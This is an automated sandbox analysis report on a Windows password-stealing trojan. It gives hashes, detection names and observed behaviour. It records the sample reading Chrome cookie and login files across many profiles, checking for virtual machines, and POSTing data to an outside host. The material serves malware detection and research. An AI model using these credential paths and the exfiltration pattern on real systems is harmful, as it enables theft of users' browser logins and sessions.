Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 18, 2021, 9:27 a.m.	Oct. 18, 2021, 9:31 a.m.

Size	1.4MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`807f55cee679ba76724aee80756a0c4f`
SHA256	`d788b085cc98c274abd24c4ac8d00f870297dc4f5b68684af8a5c328cc50beb4`
CRC32	`44A360D7`
ssdeep	`24576:ur0Y0b3wTBY0zc3OHmIOss9/DQTBlFadP6WNltPSQv:ub6gT20iOHmIPWDQll86Ytfv`
PDB Path	D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb
Yara	ASPack_Zero - ASPack packed file IsPE64 - (no description) PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

customer6.exe "C:\Users\test22\AppData\Local\Temp\customer6.exe"
2132

Name	Response	Post-Analysis Lookup
ip-api.com	A 208.95.112.1	208.95.112.1
staticimg.youtuuee.com	A 45.136.151.102	45.136.151.102

IP Address	Status	Action
164.124.101.2	Active	Moloch
208.95.112.1	Active	Moloch
45.136.151.102	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49163 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

This executable has a PDB path (1 event)

pdb_path

D:\workspace\workspace_c\shellcode_ms\SCY7VJ5UA3Du3GAh1_jm1\x64\Release\SCY7VJ5UA3Du3GAh1_jm1.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 18, 2021, 9:20 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

_RDATA

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

TXT

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2

Performs some HTTP requests (3 events)

request	GET http://ip-api.com/json/
request	GET http://staticimg.youtuuee.com/api/fbtime
request	POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2

Sends data using the HTTP POST Method (1 event)

request

POST http://staticimg.youtuuee.com/api/?sid=664553&key=e31e220fe7337c68de757dbfab9338d2

Steals private information from local Internet browsers (50 out of 105 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 36\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 65\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 62\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 3\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 24\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 75\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 98\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 28\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 93\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 92\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 97\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 47\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 74\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 21\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 83\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 17\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 69\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 50\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 57\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 63\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 66\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 34\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 80\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 84\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 77\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 64\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 8\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 31\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 4\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 35\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 6\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 72\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 13\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 53\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 23\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 25\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 61\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 82\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 7\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 12\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 95\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 22\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 70\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 73\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 18\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 56\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 55\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 49\Cookies

Looks up the external IP address (1 event)

domain

ip-api.com

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 18, 2021, 9:20 a.m.	flags: 15 family: 0		111	0

File has been identified by 47 AntiVirus engines on VirusTotal as malicious (47 events)

Bkav	W32.QuiccellK.Trojan
Lionic	Trojan.Win32.Fabookie.trRO
MicroWorld-eScan	Gen:Variant.Mikey.127483
FireEye	Gen:Variant.Mikey.127483
CAT-QuickHeal	TrojanPWS.Agent
McAfee	GenericRXAA-AA!807F55CEE679
Malwarebytes	Spyware.PasswordStealer
Zillya	Trojan.Agent.Win32.2475875
Sangfor	Trojan.Win32.Agent.gen
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Backdoor:Win64/TurtleLoader.d2e77d82
K7GW	Trojan ( 0058895b1 )
K7AntiVirus	Trojan ( 0058895b1 )
ESET-NOD32	a variant of Win64/Agent.ATS
TrendMicro-HouseCall	TROJ_GEN.R002C0DJE21
ClamAV	Win.Malware.Spyagent-9830839-0
Kaspersky	HEUR:Trojan-PSW.Win32.Agent.gen
BitDefender	Gen:Variant.Mikey.127483
APEX	Malicious
Tencent	Malware.Win32.Gencirc.10cf5e9a
Ad-Aware	Gen:Variant.Mikey.127483
TACHYON	Trojan-PWS/W64.Agent.1422336
Emsisoft	Trojan.Agent (A)
DrWeb	Trojan.PWS.Siggen3.3669
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-S
Ikarus	Trojan.Win64.Agent
Jiangmin	Trojan.PSW.Agent.cqm
Avira	TR/Agent.owtog
Antiy-AVL	Trojan/Generic.ASMalwS.34AA7AC
Kingsoft	Win32.PSWTroj.Undef.(kcloud)
Gridinsoft	Trojan.Win64.Agent.oa!s1
Microsoft	Backdoor:Win64/TurtleLoader.S
GData	Gen:Variant.Mikey.127483
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R444062
VBA32	TrojanPSW.Agent
ALYac	Gen:Variant.Mikey.127483
MAX	malware (ai score=100)
Cylance	Unsafe
Avast	Win64:PWSX-gen [Trj]
Rising	Stealer.FBAdsCard!1.D97B (CLASSIC)
Yandex	Trojan.Agent!ztmnNuryMyE
MaxSecure	Trojan.Malware.12570143.susgen
Fortinet	W64/Agent.ATS!tr
AVG	Win64:PWSX-gen [Trj]
Panda	Trj/CI.A

customer6.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All